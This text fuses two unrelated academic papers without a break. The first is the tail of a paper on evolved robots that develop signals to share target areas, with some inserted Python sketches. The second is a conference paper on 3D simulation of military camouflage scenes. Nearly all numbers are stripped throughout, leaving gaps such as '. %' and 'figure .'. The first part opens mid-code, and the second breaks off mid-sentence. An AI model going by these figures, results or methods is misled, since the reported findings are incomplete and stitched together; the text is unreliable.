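        ("a", "triggers signal e in other robots that are exploring"),
    "outside the areas, hearing another robot that is also outside":
        ("e", "supports a coordinated, faster exploration of the environment"),
    "alone inside a target area":
        ("b", "attracts robots located outside the area"),
    "inside a target area together with another robot":
        ("c", "keeps further robots away and pushes extra robots out"),
    "outside, approaching an area whose occupant emits b":
        ("d", "near-null signal; switches the approaching robot's signalling off"),
}

def describe(context):
    label, function = SIGNAL_LEXICON[context]
    return "signal {}: {}".format(label, function)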
the fact that signal c increases the chances that a robot exits from target area that contains more than two robots is demonstrated by the fact that the percentage of times in which one of three robots located in the same target area exit the area is . % and . % in normal and deprived conditions, respectively (see figure , black bars). the functionality of signal d (both in the case of non-reactive and reactive robots) and more generally the functionality of the effects that signals detected have on the type of signals produced will be discussed in the next section. . the evolved communication system: communication modalities evolving robots might rely on mono or bi-directional communication forms. in mono- directional communication forms, the motor behaviour or the signal produced by one individual affects the behaviour of a second individual but the behaviour of the latter individual does not alter the behaviour of the former individual. in these forms of communication, the two robots play the role of the ‘speaker’ and of the ‘hearer’, respectively, and communication can be described as a form of information exchange (in which communication allows the ‘hearer’ to access information that is available to the ‘speaker’) or as a form of manipulation (in which the ‘speaker’ alters the behaviour of the ‘hearer’ in a way that is useful to the ‘speaker’ or to both the ‘speaker’ and the ‘hearer’). in bi-directional communication forms, on the other hand, the motor or signalling behaviour of one individual affects the second individual and vice versa. in these forms of communication each robot plays both the role of the ‘speaker’ and of the ‘hearer’ (i.e. different roles cannot be identified). another important aspect that characterizes communication forms is whether they consist of static or dynamical processes. in static communication forms, the signal produced by an individual is only a function of the current state of the individual. in dynamic communication forms, instead, the signal produced at a given time step is also a function of the signals produced and detected previously. as an example of a static communication form we might consider the case of a robot emitting an alarm signal continuously (until the danger disappears). as an example of a dynamic communication form we might consider the case of two individuals that alternatively play the role of the speaker and of the hearer by taking turns (iizuka and ikegami, a, b). bi-directional and dynamical communication forms might lead to emergent properties (e.g. synchronization or shared attention) that result from the mutual interaction between two or more individuals and that cannot be explained by the sum of the individual contributions only (di paolo, ). in the experiments reported in this paper the modalities that regulate communicative behaviours are not predefined but vary within evolving individuals. indeed, as we will see, evolved agents use different communication modalities in different circumstances. to describe the communication modalities used, let us consider a simplified situation in which a team consisting of two robots is placed in an arena that includes only a single target area. figure (left) and figure show the typical motor and signalling behaviour exhibited by two reactive robots. initially the two robots are both outside the target area and produce a signal with an value of about . (signal a). 
when the two robots get close enough and detect the other robot’s signal, they slightly change their motor trajectories so as to increase their chances to end up in a target area. individual # reaches the target area and starts to produce a signal with a value of about . (signal b). once robot # gets close enough to robot # (i.e. as soon as it starts to detect the signal b produced by robot # ) it modifies its trajectory so as to approach the direction of the signal and it starts to produce signal d (i.e. a signal with an almost null value). later on, when robot # enters the area, the two robots start to produce a highly varying signal with a value of about . (signal c). signal c affects the motor behaviour of robots located outside the target area (which tend to avoid the target area) and inside the target area (which tend to exit from areas that contain more than two robots). signal c also affects the signalling behaviour of other robots located inside a target area. indeed, robots located inside a target area switch their signalling behaviour from b to c when they detect the signal produced by another robot located in the same target area. figure . the behaviour of two robots tested in an arena including a single target area. the dashed and full lines represent the trajectories of robot # and # , respectively. the numbers indicate both the starting and ending positions of the corresponding robots. left: typical behaviour exhibited by a reactive robot. right: typical behaviour exhibited by a non-reactive robot. figure . values of the signals produced by the two reactive robots during the behaviour shown in the left side of figure (horizontal axis: lifecycles; vertical axis: signal intensity). dashed and full lines indicate the values of the signals produced by robot # and # , respectively. letters (a, b, c, and d) indicate the classes of signals produced by the robots. the black lines at the bottom of the figure indicate the three phases in which: ( ) both robots are outside the target area, ( ) robot # is in and robot # is out, and ( ) both robots are inside the target area. the grey lines at the bottom of the figure indicate the phases in which the two robots are located within signal range. the short signals produced by the robots outside target areas occur when they detect an obstacle through their infrared sensors; these signals do not seem to play any functional role. as shown in figure (right) and figure , non-reactive robots rely on similar communication modalities. initially the two robots are both outside the target area and produce a signal with a value of about . (signal a). as soon as the two robots get close enough to detect each other’s signals, they produce a signal with a varying value and an average value of . (signal e) and they vary their motor trajectories by increasing their turning angle so as to increase their chances to enter a target area. after some time robot # reaches the target area and starts to produce a signal with a value of about . (signal b). later on, once robot # returns close enough to robot # and detects the signal b produced by robot # , it modifies its motor trajectory (by approaching robot # ) and its signalling behaviour (by producing signal d, i.e. a signal with an almost null value, instead of signal a). when robot # also enters the area, the two robots start to produce a varying signal with an average value of about . (signal c).
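traces like the ones plotted in the two signal figures can be reproduced by logging, at every time step, each robot's emitted signal together with a phase label derived from the ground sensor; a minimal sketch, in which the simulator interface and the attribute names are hypothetical:

def label_phase(robot1_in_area, robot2_in_area):
    """phase labels used in the signal-trace figures."""
    if robot1_in_area and robot2_in_area:
        return "both in"
    if robot1_in_area or robot2_in_area:
        return "one in, one out"
    return "both out"

def log_signal_trace(env, robots, steps=1000):
    trace = []   # (time step, phase, signal of robot 1, signal of robot 2)
    r1, r2 = robots
    for t in range(steps):
        env.step(robots)   # placeholder: one simulation update
        trace.append((t, label_phase(r1.on_target_area, r2.on_target_area),
                      r1.signal, r2.signal))
    return trace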
signal c reduces the probability that other robots will enter the area and, eventually, if an additional robot erroneously joins the area, increases the probability that one of the robots exits from the area. figure . values of the signals produced by the two robots provided with hidden units during the behaviour shown in the right side of figure (horizontal axis: lifecycles; vertical axis: signal intensity). dashed and full lines indicate the values of the signals produced by robot # and # , respectively. letters (a, b, c, d and e) indicate the classes of signals produced by the robots. the black lines in the bottom part of the figure indicate the three phases in which: ( ) both robots are outside the target area, ( ) robot n. is in and robot n. is out, and ( ) both robots are inside the target area. the grey line in the bottom part of the figure indicates the phases in which the two robots are located within signal range. the short signals produced by the robots outside target areas occur when they detect an obstacle through their infrared sensors; these signals do not seem to play any functional role. by analysing the functionality of the different signals and the context in which they are used, we can see how evolved robots use different communication modalities and select on the fly the modality that is appropriate for the current situation. the situation in which one robot is located inside a target area and another robot is located outside, within the communication range, is a case in which the former robot has access to information (related to the location of the target area) to which the latter robot does not have access. in this particular case, communication should be mono-directional since the latter robot should change its behaviour on the basis of the signal produced by the former robot, while the former robot should not necessarily change its motor or signalling behaviour as a result of the signal produced by the latter robot. indeed, in this situation the evolved robots rely on a mono-directional communication form in which the former robot produces the signal b and the latter robot switches its signalling behaviour off by producing the signal d (i.e. a signal with an almost null value). this communication interaction can thus be described as a form of information exchange in which the former robot (the speaker) produces a signal that encodes information related to the location of the target area and the latter robot (the hearer) exploits this information to navigate toward the area. alternatively, this communication interaction can be described as a form of manipulation in which the former robot (the speaker) manipulates the motor behaviour of the latter robot (the hearer) so as to drive the robot toward the target area. the ability of robots located outside target areas to switch their signalling behaviour off (i.e. to produce the signal d) as soon as they detect the signal b plays an important function both in the case of reactive and non-reactive robots. indeed, by testing a team of two robots in an environment including a single target area, in a normal condition and in a control condition in which robots were prevented from switching between signals a and d, we observed that performance in the control condition is much worse. more precisely, the percentage of trials in which both robots were able to reach the target area within seconds drops from . % to . % (in the case of reactive robots) and from . % to .
% (in the case of non-reactive robots) in the normal and control conditions, respectively (figure ). figure . percentage of trials in which a team of two robots randomly placed in an environment with only one target area are able to both enter the target area. tests performed in a normal condition and in a control condition in which robots outside the target area were not allowed to switch their signalling behaviour from a to d. grey and black bars represent the performance of reactive and non-reactive robots, respectively. average performance obtained by testing the robots for trials lasting seconds. on the contrary, when two robots are located in the same target area, neither of the two robots has access to the relevant information (i.e. the fact that the target area contains two robots). this information, however, can be generated by the interaction between the two robots through a bi-directional communication modality. this is indeed the communication modality that is selected by evolved robots in this circumstance. the signal produced by one of the two robots affects the signal produced by the second robot, and vice versa. this bi-directional interaction allows the two robots to switch from signal b (i.e. a signal that increases the chances that other robots will join the area) to signal c (i.e. a signal that decreases the chances that other robots will join the area). interestingly, in this circumstance evolved robots also rely on a dynamical communication modality, i.e. they produce signals that vary in time as a result of signals previously produced and detected by the two robots. more precisely, in the case of non-reactive robots, the signal c tends to vary in time as a result of the following factors: ( ) the value of the signal detected inhibits the signal produced, ( ) the intensity of the inhibition also depends on the direction of the detected signal, ( ) the signal tends to be detected from continuously varying relative directions since robots located inside target areas turn on the spot. the production of an oscillatory signal with an average value of . (in the case of non-reactive robots) in this situation, rather than a stable non-dynamical signal, plays an important functional role. indeed, we observed that evolved robots rely on oscillatory signals in all the replications of the experiment (both in the case of reactive and non-reactive robots). moreover, we observed that stable signals do not allow the robots to reach the same level of performance. to ascertain whether the production of a stable signal could lead to the same functionality as this oscillatory signal, we performed a test in which non-reactive robots were forced to emit a stable signal when located in a target area that contained two robots. robots were allowed to behave normally in all other cases. the test was repeated times by using stable signals with different values ranging from . to . . the fact that, as shown in figure , the obtained performance is always lower than the performance obtained by allowing the robots to produce the oscillatory signal confirms that the dynamical nature of the signal is functional. figure . the continuous line represents the fitness values obtained by a team of non-reactive robots tested in a control condition in which robots are forced to emit a stable signal when they are located in a target area that contains two or more robots. the vertical and horizontal axes represent the fitness and the value of the signal, respectively.
the dashed line represents a benchmark showing the value of the fitness reached by a team tested in normal condition. for each condition robots are tested for trials. one reason that might explain the necessity to rely on an oscillatory signal in this circumstance is the fact that the signal c has at least three different functions: it informs other robot located in the target area of the presence of the signalling robot, it reduces the probability that other robots enter the target area, and it increases the probability that, when the target area contains more than two robots, one of the robot will exit the area. indeed by analysing the behaviour of the robots in the test in which robots were forced to produce signals with a fixed value we observed that: (a) when the value of the signal is below . , robots tend to erroneously exit from the target area also when the area includes only two robots, and (b) when the value of the signal is . or above, both the ability to reduces the chances that other robots joint the target area and the ability to increase the chances that robots exit from the target area (when the area contains more that two robots) are severely impaired. another possible reason that might explain the necessity to produce an oscillatory signal is the fact that the signal c must produce the same effect (i.e. reduce the chances that other robots enter in the target area) both when the signal is produced by two or three interacting robots located into the same target area, and two different effects (i.e. increase the chances that one robot exit from the target area or not) when the signal is produced by three or two robots located in the same target area, respectively. the frequency of oscillation of signal c varies when the signal is produced by two or three robots located in the same target area. indeed, by analysing the signals produced in these two circumstances by a fourier transform, we observed that the frequency and the spectrograms are different in the two cases (see figure ). these two signals, c and c , emitted by a robot located in an area with another or two other robots respectively, have different functions since signal c increases the chances that one of the robot exits from the target area while signal c does not. figure . the two spectrograms (obtained by the fourier transform) of the signal c emitted by a robot. the left and right pictures correspond to the signal produced by a robot located in a target area that contains another or another two robots, respectively. the sampling frequency is hz, since each communication output is emitted by a robot each . seconds. therefore, the frequency components range is [ , ] hz. . relation between individual and social/communicative behaviour since the robots individual and social behaviour co-evolve we might wonder which the relation between these two forms of behaviour is and how the possibility to co-adapt these forms of behaviour is exploited in evolved individuals. the fact that the performance of robots that are tested in the “deprived” control condition is similar to that of robots evolved and tested in a “no-signal” control condition (see figure ) indicates that evolved robots develop an effective individual behaviour (i.e. a behaviour that maximizes the performance that can be achieved without signalling) even if they have always been evaluated in a normal condition (in which signals are available). 
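the spectral comparison of the two variants of signal c mentioned in the previous section amounts to a discrete fourier transform of the logged signal values; a minimal numpy sketch, with the sampling rate left as a placeholder since the exact value is not legible in this copy of the text:

import numpy as np

def signal_spectrum(signal_values, sample_rate_hz=10.0):
    """magnitude spectrum of a logged communication signal; sample_rate_hz is
    an assumed placeholder (one sample per control step)."""
    x = np.asarray(signal_values, dtype=float)
    x = x - x.mean()   # remove the constant (dc) component
    freqs = np.fft.rfftfreq(len(x), d=1.0 / sample_rate_hz)
    return freqs, np.abs(np.fft.rfft(x))

# comparing the dominant frequencies of signal c recorded with one or with two
# other robots in the same area (hypothetical traces c2 and c3):
#   f2, s2 = signal_spectrum(c2)
#   f3, s3 = signal_spectrum(c3)
#   print(f2[s2[1:].argmax() + 1], f3[s3[1:].argmax() + 1])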
the adaptive pressure toward the development of an effective individual behaviour can be explained by considering that the social enhancement that can be achieved by exploiting the signals produced by the other robots is not always guaranteed. indeed, the availability of the required signals depends on the presence of other robots in the right environmental locations which, in turn, is influenced by unpredictable variables such as the initial positions and orientations of the robots. by analysing the behaviour displayed by evolved robots tested in the “deprived” control condition (figures ), we can see that both reactive and non-reactive robots are able to spend about % of their lifetime in the three most favourable conditions (in which the team gathers a fitness of . , . , or . ) and less than % of their lifetime in the two least favourable conditions (in which the team gathers a fitness of - . or - . ). these performances are achieved through a simple behaviour (see figure ) that includes the following elementary behaviours: (a) when robots approach walls or other robots they avoid the obstacles by turning approximately o; (b) when the robots are far from walls and are not located in target areas they move by producing a curvilinear trajectory; (c) when the robots are located in a target area, they remain in the area by turning on the spot. reactive and non-reactive robots mainly differ with respect to the curvilinear trajectories produced far from walls, which lead to smaller and larger semi-circles in the case of reactive and non-reactive robots, respectively. these larger semi-circular trajectories allow non-reactive robots to find the target areas much more quickly than reactive robots. indeed, the percentage of lifecycles in which all four robots are located in the target areas is about % and %, on average, in the case of reactive and non-reactive robots (see figure ). the fact that non-reactive robots are better at finding the target areas, however, does not translate into better performance (in the “deprived” condition) since non-reactive robots are more likely to spend their lifetime both in positive conditions (in which each target area contains one or two robots) and negative conditions (in which a target area contains three or four robots). as a consequence, although non-reactive robots display a better exploration strategy than reactive robots, the overall performance of reactive and non-reactive robots is similar in “deprived” conditions. figure . typical behaviour displayed by the team of evolved robots in a “deprived” condition in which they are not allowed to detect other robots’ signals, for reactive (left) and non-reactive robots (right). the numbers indicate the starting and ending position of the corresponding robot (the ending position is also marked with a white circle). figure . percentage of lifecycles spent by a team of four robots in the possible different states, tested in a “deprived” condition in which robots are not allowed to detect other robots’ signals. “void” indicates the case in which all four robots are located outside target areas (fitness = . ). “ ” indicates the case in which only a single robot is located in a target area (fitness = . ). “ ” indicates the case in which two robots are located in target areas. “ + ” indicates the case in which one robot is located in a target area and two other robots are located in the other target area (fitness = . ).
" + " indicates the case in which each of the two target areas contains two robots (fitness = . ). " + " indicates the case in which one target area contains one robot and the other contains three robots (fitness = . ). " " indicates the case in which three robots are located in the same target area (fitness = - . ). " " indicates the case in which four robots are located in the same target area (fitness = - . ). grey and black bars represent the performance of reactive and non-reactive robots, respectively. average performance obtained by testing the robots for trials lasting cycles. when we look at the relation between individual and social behaviour, however, we can see that the characteristics of the individual behaviour exhibited by reactive and non-reactive robots perfectly match the characteristics of their social/communicative behaviour. in other words, individual and social behaviour are tightly co-adapted. the fact that reactive robots display a 'sub-optimal' exploration behaviour (i.e. a behaviour that does not maximize the probability of quickly finding and entering target areas) can be explained by considering their limited ability to avoid target areas that already contain two robots and to exit from target areas that contain more than two robots (see figures and ). a reliable ability to avoid situations in which more than two robots are located in the same target area thus constitutes a prerequisite for the emergence of a better exploration ability. the lack of this prerequisite in reactive individuals explains why their exploration ability is not further optimised. on the other hand, the better capability of non-reactive robots to avoid situations in which more than two robots are located in the same target area (see figures and ) explains why evolved non-reactive robots developed a more effective exploration behaviour. indeed, if we look at the time spent by robots in target areas that contain more than two robots, we can see that in a "deprived" condition non-reactive robots are much worse than reactive robots (figure ), whereas in normal conditions non-reactive robots are much better than reactive robots (figure ). figure . percentage of lifecycles spent by a team of four robots in the possible different states (see the legend of figure ) tested in a normal condition. grey and black bars represent the performance of reactive and non-reactive robots, respectively. average performance obtained by testing the robots for trials lasting cycles.
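as an illustration of how the per-state lifecycle percentages reported in these figures can be obtained, the sketch below classifies each logged cycle by how many robots occupy each of the two target areas and tallies the time spent in each state. the log format and the fitness values used here are placeholders chosen only for illustration; the actual values used in the experiments are not recoverable from this text.

from collections import Counter

# placeholder fitness per state, keyed by the sorted pair
# (robots in one area, robots in the other); values are illustrative only
fitness_table = {(0, 0): 0.0, (1, 0): 0.25, (1, 1): 1.0, (2, 0): 0.5,
                 (2, 1): 1.25, (2, 2): 2.0, (3, 0): -1.0, (3, 1): -0.75, (4, 0): -2.0}

def classify(counts):
    # order-independent state label: (1, 2) and (2, 1) are the same state
    return tuple(sorted(counts, reverse=True))

def state_statistics(log):
    """log: one (robots_in_area_a, robots_in_area_b) tuple per lifecycle step."""
    states = Counter(classify(c) for c in log)
    total = sum(states.values())
    percentages = {s: 100.0 * n / total for s, n in states.items()}
    mean_fitness = sum(fitness_table.get(s, 0.0) * n for s, n in states.items()) / total
    return percentages, mean_fitness

# toy log of four cycles with different occupancies of the two target areas
print(state_statistics([(0, 0), (1, 0), (2, 1), (2, 2)]))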
. discussion in this paper we have described the results of an experiment in which an effective communication system arises among a collection of initially non-communicating agents evolved for the ability to solve a collective navigation problem. by analysing the obtained results we observed how evolving individuals developed: (a) an effective communication system, (b) an effective individual behaviour, and (c) an ability to rely on different communication modalities and to autonomously select the modality that is appropriate to the current circumstances. the communication system that emerges in the experiments is based on - different signals that characterize crucial features of the environment, of the agent/agent relations, and of the agent/environment relations (e.g. the relative location of a target area, the number of agents contained in a target area, etc.). these features, which have been discovered autonomously by the agents themselves, are grounded in the agents' sensory-motor experiences. the signals used, therefore, do not refer only to the characteristics of the physical environment but also to those of the social environment constituted by the other agents and by their current state. evolved individuals also display an ability to appropriately tune their individual and communicative behaviour on the basis of the signals detected (e.g. by approaching, avoiding, or exiting a target area, or by modifying their exploratory behaviour). indeed, the type of signals produced, the context in which they are produced, and the effect of the signals detected constitute three interdependent aspects of the communication system that co-adapt during the evolutionary process and co-determine the 'meaning' and the efficacy of each signal and of the communication system as a whole. the individual behaviour of evolved robots includes simple elementary behaviours that allow robots to avoid obstacles, explore the environment, and remain in target areas. interestingly, the robots' individual behaviour tends to be optimised (with respect to the possibility of obtaining the best possible performance when signals produced by other robots are not available) despite the fact that robots are always evaluated in social conditions during the evolutionary process. this unexpected result might be explained by considering that the required signals might not always be available (even in normal conditions in which robots are allowed to communicate), since their availability depends on the physical location of the robots in the environment, which in turn depends on unpredictable events such as the robots' initial positions and orientations or noise. in other words, optimised individual behaviours guarantee good performance even when the required signals are not available. this tendency to optimise both individual and social behaviour leads to the development of control systems structured hierarchically according to a layered organization in which the individual abilities represent the most basic layer and the communication/social abilities represent a higher-level layer that modulates the lower level. the fact that communication abilities represent a high-level structure that modulates the basic individual behaviours of the robots does not prevent evolving robots from co-adapting their individual and communicative behaviour. indeed, by comparing the results of different replications of the experiments, we observed that individual behaviours tend to be selected not only in order to maximize individual performance (when signals from other robots are not available) but also in order to maximize the performance that can be achieved by combining the robots' individual and social capabilities. evolved robots also exploit different communication modalities (e.g. mono-directional forms of communication in which one robot acts as a 'speaker' and a second robot acts as a 'hearer', or bi-directional forms in which two robots concurrently influence each other through their signalling and/or motor behaviour) by selecting the modality that is appropriate to each specific communicative interaction. evolving individuals also engage in complex communication behaviours that involve three different robots that concurrently affect each other so as to produce appropriate collective behaviours (e.g. so as to push one of the three robots located inside the same target area out of the area). evolved robots also exploit time-varying signals that allow them to generate information that is not available to any single robot (e.g.
information related to how many robots are located in a target area) and that serve different functions. the analysis of the evolutionary dynamics suggests that new individual capabilities might represent a crucial prerequisite for the development of new communication capabilities and vice versa. for example, the individual ability to explore the environment by entering and remaining in target areas represents a crucial prerequisite for the development of an ability to produce signal b, which attracts other robots toward the target area. on the other hand, the emergence of a social/communicative ability to avoid target areas that contain two robots and to exit from areas that contain more than two robots represents a crucial prerequisite for the development of better individual exploration strategies. in fact, as we showed in section , very effective exploration strategies provide an adaptive advantage only in combination with effective communication systems that allow robots to avoid situations in which more than two robots are located in the same target area. this process, in which progress in individual abilities might lay the basis for progress in communication abilities and vice versa, might lead to an open-ended evolutionary phase in which individuals tend to develop progressively more complex and effective strategies. acknowledgments the research has been supported by the ecagents project funded by the future and emerging technologies programme (ist-fet) of the european community under eu r&d contract ist- .
international conference on sensor network and computer engineering (icsnce ) the research and implementation of d scene simulation of camouflage yu jun, school of computer science and engineering, xi'an technological university, xi'an, shaanxi, china, e-mail: yujun@xatu.edu.cn; li zhonghua, school of computer science and engineering, xi'an technological university, xi'an, shaanxi, china, e-mail: @qq.com; hu zhiyi, engineering design institute, army academy of pla, beijing, china, e-mail: huzhiyi v @ .com; dai jun, school of computer science and engineering, xi'an technological university, xi'an, shaanxi, china, e-mail: daijun @qq.com. abstract—aiming at problems in the camouflage design of military engineering, such as strong subjectivity and an unpredictable camouflage effect, we propose a d camouflage scene simulation method based on mfc and vega prime technologies. on the basis of real dem data of an area in america, we use d visualization techniques to create the terrain model and the ground object models. the camouflage pattern is applied to the surface of the models by texture mapping technology, and the real-time rendering engine vega prime is used to render the models and create the camouflage simulation scene. the results show that a virtual camouflage scene can be generated by using visual simulation technology, which helps to test the effect of the camouflage pattern. keywords-camouflage; terrain modeling; visual simulation; digital elevation model i. introduction camouflage, as the most basic military camouflage technology, is one of the commonly used methods to counter reconnaissance and attack in modern warfare[ ]. the commonly used method of engineering camouflage is to paint camouflage patterns on the surface of the target with dope; however, the effect of this kind of camouflage is influenced by environmental factors.
this usually requires personnel to participate in the evaluation of camouflage effects, so it may consume a lot of resources. many scholars have therefore begun to use vega prime (vp) based visual simulation technology to build d models of military targets or to reproduce a realistic environment in order to achieve realistic simulation results. for example, zhang[ ] combined the development features of mfc application programs, gave a d visual development method based on multi-process technology, and applied it to the development of the d scene of a portable air-defence missile simulator. yao[ ] focused on large-scale real-terrain visualization techniques based on the terrain visualization features of large virtual battlefields. hu[ ] made a further improvement on zhang's work[ ], giving a program framework that seamlessly integrates vp with the mfc library programming environment under vc++ and optimizing the structure of the system. however, none of the above methods can perform real-time simulation of real d space or offer interactive capabilities, which makes them unsuitable for the simulation of engineering camouflage. in response to these problems, this paper builds on the d visual simulation method[ - ] and real dem data, combined with the actual engineering camouflage environment, to establish an mfc-based vega prime visual simulation framework and design a real-time roaming simulation of a camouflage scene. ii. the overall design of the simulation system the camouflage d scene simulation system includes two parts: the simulation model and the simulation scene. the simulation model refers to all the models in the target area, and the simulation scene refers to the virtual camouflage scene generated in order to achieve the effect of the engineering camouflage simulation. the design and development of the engineering camouflage simulation system can be divided into the following four steps, and the overall system framework is shown in figure . figure . framework of the simulation system. a. build terrain model acquire high-precision dem data and satellite ortho-photo data of a certain region and establish the terrain model of the simulation scene in terra vista to reproduce the altitude and undulation of the surface. b. build ground object model according to the plane layout, texture, material, and other data of the ground surface around the simulation scene, the ground object models are constructed with multigen creator, thereby building the military equipment, weapons, and storage camps of the scene. c. camouflage scene model according to the background and target characteristics around the simulation scene, yu's[ ] camouflage design method is used to obtain the digital camouflage pattern, the camouflage pattern is mapped onto the surface of the d models, and the disguised models are arranged in the whole scene. d. rendering and implementation the openflight api is used to programmatically export the layout information of the models, then vega prime and visual studio are used to write the real-time scheduling and display program, which is combined with the mfc framework to generate a real-time roaming simulation scenario.
iii. establishing and rendering the model a. the establishment of the terrain model in the field of military camouflage, terrain refers to the natural state of the earth's surface. whether a target can be detected or not depends on the complexity of the terrain and the difference between the target and the background[ ]. a terrain model is an abstract and simplified expression of real terrain attributes; it is therefore inevitably involved in the display and processing of d geospatial scenes in battlefield environment simulation, and terrain visual simulation has become a hot spot of d scene simulation research for the battlefield environment. terra vista is multigen's software for modeling complex terrain for visual simulation and is used here to build the d terrain simulation model. terra vista manages d terrain data in a project and is mainly composed of a terrain data source library, terrain parameter configuration, vector parameter configuration, cdb-format terrain file browsing, and a model database. it runs on the windows platform and generates a terrain database in metaflight or openflight format that can be used directly on pc workstations or other graphical vision systems. terra vista builds a d terrain simulation model mainly in three steps: data loading, setting terrain parameters, and calculating and generating the terrain. ) data loading this mainly includes the import of data such as elevation data, satellite image data, and vector data. first, load the digital elevation data. a certain km area of america is taken as the camouflage scene. the more accurate the dem data is, the more realistic the terrain is, and the more detailed local features of the real terrain can be expressed. for simulation scenarios, the accuracy of the terrain grid is generally m to m. therefore, yu[ ] proposed an improved bilinear interpolation algorithm to interpolate on the basis of the original dem data, thereby improving the accuracy of the dem data (a minimal sketch of the plain bilinear scheme that such an improvement starts from is given at the end of this data-loading step). the original m-accuracy elevation map and the m-accuracy elevation map obtained with yu's method are shown in figure . figure . the m-accuracy (a) and m-accuracy (b) elevation maps. second, load the satellite image data. bing maps satellite imagery is used to obtain satellite images of the area to be camouflaged. the imagery is a mercator projection on a spherical datum, while the srtm dem uses a geocentric projection on a wgs datum, so a format conversion is required. the projection conversion tool in global mapper is used to convert the satellite imagery into the wgs geocentric projection format. the ortho-photos obtained are shown in figure . figure . ortho-photo maps. finally, load the vector data. the vector data refers to the polygons in the terrain database other than the terrain itself. it can be formed naturally, such as lakes and rivers, or constructed artificially, such as buildings and roads. we use the satellite image to create vector data for this area in terra vista. the main rules are: create point details for objects with limited area, location, and orientation that do not require a specific shape; create linear details for objects whose length is much larger than their width and height; and create area details for objects that occupy a large area and whose edges need to be defined.
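the improved interpolation algorithm of yu[ ] is not reproduced here; as a reference point, the following is a minimal sketch of plain bilinear interpolation used to densify a regular-grid dem, i.e. the baseline that such an improvement starts from. the array shape and the densification factor are illustrative assumptions.

import numpy as np

def bilinear_resample(dem, factor):
    """densify a regular-grid dem by plain bilinear interpolation.

    dem: 2-d array of elevations on a regular grid.
    factor: integer densification factor (e.g. 3 to refine a coarse grid).
    """
    rows, cols = dem.shape
    # target sample positions expressed in source-grid coordinates
    r = np.linspace(0, rows - 1, (rows - 1) * factor + 1)
    c = np.linspace(0, cols - 1, (cols - 1) * factor + 1)
    r0 = np.floor(r).astype(int).clip(0, rows - 2)
    c0 = np.floor(c).astype(int).clip(0, cols - 2)
    dr = (r - r0)[:, None]
    dc = (c - c0)[None, :]
    # weighted average of the four surrounding grid posts
    top = dem[np.ix_(r0, c0)] * (1 - dc) + dem[np.ix_(r0, c0 + 1)] * dc
    bottom = dem[np.ix_(r0 + 1, c0)] * (1 - dc) + dem[np.ix_(r0 + 1, c0 + 1)] * dc
    return top * (1 - dr) + bottom * dr

coarse = np.array([[10.0, 12.0], [14.0, 18.0]])
print(bilinear_resample(coarse, 2))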
) terrain parameter settings these mainly include the levels of detail (lod), the visual distance, the size of the grid, and the method used to construct the grid. terrain lod technology is a terrain drawing method that reduces the geometric complexity of the terrain scene by simplifying the details of the terrain surface step by step without affecting the visual effect of the scene, thereby improving the efficiency of the rendering algorithm. in this paper, the lod is constructed using a quadtree hierarchy: each layer divides the terrain into several grid cells, the next layer quarters each cell of the previous layer, and so on, and each cell in the hierarchy is subdivided into a number of triangles (a minimal quadtree subdivision sketch is given at the end of this subsection). the simulation scene lod is set to three levels, the visual distance is set to m, the terrain block is set to m × m, and the delaunay algorithm is used to construct a triangular mesh and generate multi-resolution geometric terrain, as shown in figure . figure . terrain models with different resolutions: (a) lod , (b) lod , (c) lod . ) calculate and generate terrain the gaming area tool is used to select the target area to be generated, set the format and resolution of the output texture image, and determine the output model format; taking into account later amendments in creator, this article uses the openflight format. in the process of generating the terrain model, the generated terrain is stored in openflight model files in units of the divided grid cells. finally, each model node is unified under an external reference node in the file named master.flt. the final geometric terrain is shown in figure . figure . terrain map.
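the three-level quadtree lod scheme described above can be pictured with the small sketch below, which recursively quarters a square terrain block and keeps finer levels only near the viewer. the block size, viewer position, and distance threshold are illustrative assumptions rather than the parameters used by terra vista.

def quadtree_lod(cx, cy, size, viewer, level=0, max_level=2):
    """recursively quarter a square terrain block, refining only near the viewer.

    returns a list of (center_x, center_y, size, level) tuples, one per rendered patch.
    """
    dist = ((cx - viewer[0]) ** 2 + (cy - viewer[1]) ** 2) ** 0.5
    # refine while the block is close to the viewer relative to its size
    if level < max_level and dist < 2.0 * size:
        half = size / 2.0
        patches = []
        for dx in (-half / 2.0, half / 2.0):
            for dy in (-half / 2.0, half / 2.0):
                patches += quadtree_lod(cx + dx, cy + dy, half, viewer, level + 1, max_level)
        return patches
    return [(cx, cy, size, level)]

# toy example: a 1000 m x 1000 m block with the viewer near one corner
print(len(quadtree_lod(500.0, 500.0, 1000.0, viewer=(100.0, 100.0))))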
b. build ground object model the ground object model is an important part of the battlefield environment, including natural land objects, military equipment, blockhouses, storage barracks, and other important battlefield objects. multigen creator is a visual simulation software package for creating d models. the core of the software is its modeling module, which provides a visual environment for creating and editing database files[ ]. differently from common modeling tools such as ds max and maya, creator uses a hierarchical structure to describe the simulation scenario; it can conveniently organize the model according to its geometric features and is suitable for real-time traversal operations[ ]. the steps for modeling with creator are as follows: step : determine the model data. for natural objects, information such as location and area is required; for buildings, information such as the floor plan, section drawing, and three views is needed. step : determine the hierarchical structure of the model, decomposing the model according to a tree structure, such as the floors of a building, the inner walls, etc. step : use yu's algorithm[ ] to generate the camouflage pattern; the selected typical background and the generated camouflage pattern are shown in figure . figure . the generation of camouflage patterns: (a) typical background; (b) camouflage pattern. step : use texture mapping technology to map the camouflage pattern of figure onto the surface of the d model; through the interactive control module, the object can be rotated or the viewpoint changed to obtain different perspectives, giving a d view of the camouflaged target with practical application value. finally, the d models are placed in the simulation scene at the corresponding proportions. the ground object models are shown in figure and figure . figure . helicopter camouflage model. figure . tank camouflage model. c. rendering and implementation of the model the real-time rendering engine is the core of the camouflage simulation scene. vega prime, a real-time d visual simulation tool developed by multigen, is widely used in military simulation[ ]. vp includes the lynx prime graphical user interface configuration tool and the vsg advanced cross-platform scene rendering api[ ]. this article calls vp within the mfc library environment to implement the virtual real-time simulation system. the specific method is as follows: step : create a single thread in the application to run the whole vp program, including the initialization, definition, configuration, and frame-loop phases. step : add the member function responsible for starting this thread to the view class of the mfc framework. step : use the api function afxbeginthread to start the vp thread and continuously refresh the vp visual window in the background. iv. simulation results and analysis the engineering camouflage scene system developed with vp technology is shown in figure . the system interface is mainly composed of several parts. part is a model-creation subpanel, which loads openflight-formatted terrain and ground object model data, generates the digital camouflage pattern, and applies the camouflage to the terrain and object models in the simulation scene; part is a rendering configuration subpanel, which sets the observer, the motion mode, and the atmospheric environment of the simulation and controls the simulation scene through translation, scaling, rotation, etc.; part is a simulation control subpanel, which controls the start and end of the roaming of the whole simulation scene; part is a display subpanel that shows the full view of the scenario. the user can use a pc to roam freely in the virtual scene; the system performs real-time rendering and updating according to the position of the movement, and the user can view the layout of the simulation scene from different perspectives and positions by switching from a close-range perspective to a distant 